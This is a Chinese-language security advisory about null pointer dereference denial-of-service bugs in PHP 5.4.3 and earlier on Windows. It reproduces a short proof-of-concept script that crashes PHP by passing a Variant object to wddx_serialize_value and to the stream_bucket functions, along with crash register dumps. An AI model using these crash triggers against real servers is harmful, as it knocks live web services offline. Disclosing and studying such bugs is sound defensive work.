PHP 5.4.3 多个空指针引用拒绝服务漏洞

PHP 5.4.3 多个空指针引用拒绝服务漏洞

漏洞版本:

PHP 5.4.3

漏洞描述:

BUGTRAQ  ID: 53643

PHP是一种HTML内嵌式的语言，PHP与微软的ASP颇有几分相似，都是一种在服务器端执行的嵌入HTML文档的脚本语言，语言的风格有类似于C语言，现在被很多的网站编程人员广泛的运用。

PHP 5.4.3之前版本在实现时存在空指针引用导致的多个拒绝服务漏洞，攻击者可利用这些漏洞造成应用崩溃。

condis

测试方法:

<?php
 
/*
 
PHP <= 5.4.3 wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Derefernce
Author : condis
Date : 10.04.2012 AD
Website : http://cond.psychodela.pl
 
----
 
Download : http://php.net/downloads.php
 
Tested on:
    
    PHP 5.3.8  + Windows XP SP3 Professional PL
    PHP 5.3.10 + Windows XP SP3 Professional PL
    PHP 5.4.0  + Windows XP SP3 Professional PL
    PHP 5.4.3  + Windows XP SP3 Professional PL
    
Description:
 
wddx_serialize_value and wddx_serialize_vars functions fails to handle Variant
object when it is given as a first argument.
 
Registers:
 
    EAX 00000000
    ECX 1056AAE8 php5ts.1056AAE8
    EDX 100EFCE0 php5ts.100EFCE0
    EBX 01032AB0
    ESP 00C0FAE0
    EBP 00000000
    ESI 0121E478
    EDI 0121CB50
    EIP 1028F22E php5ts.1028F22E
 
Crash:
 
    1028F22E   8A45 25          MOV AL,BYTE PTR SS:[EBP+25]
 
Situation looks pretty much the same for both wddx_serialize_vars and
wddx_serialize_value. Also functions stream_bucket_prepend and stream_bucket_append
have some problems with handling Variant object when given as a second argument:
 
stream_bucket_append(1, new Variant(1));
stream_bucket_prepend(1, new Variant(1));
 
PS : Variant object is only available in PHP for Windows OS and it was implemented
in PHP > 4.1.0 and PHP 5.
 
For more details check : http://php.net/manual/en/class.variant.php
 
PS2: After running this via webserver my Apache wasn't able to handle requests
anymore and I had to restart him :)
 
kthxbye
 
*/
 
wddx_serialize_value(new Variant(666));
 
?>

安全建议:

厂商补丁：

PHP
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.php.net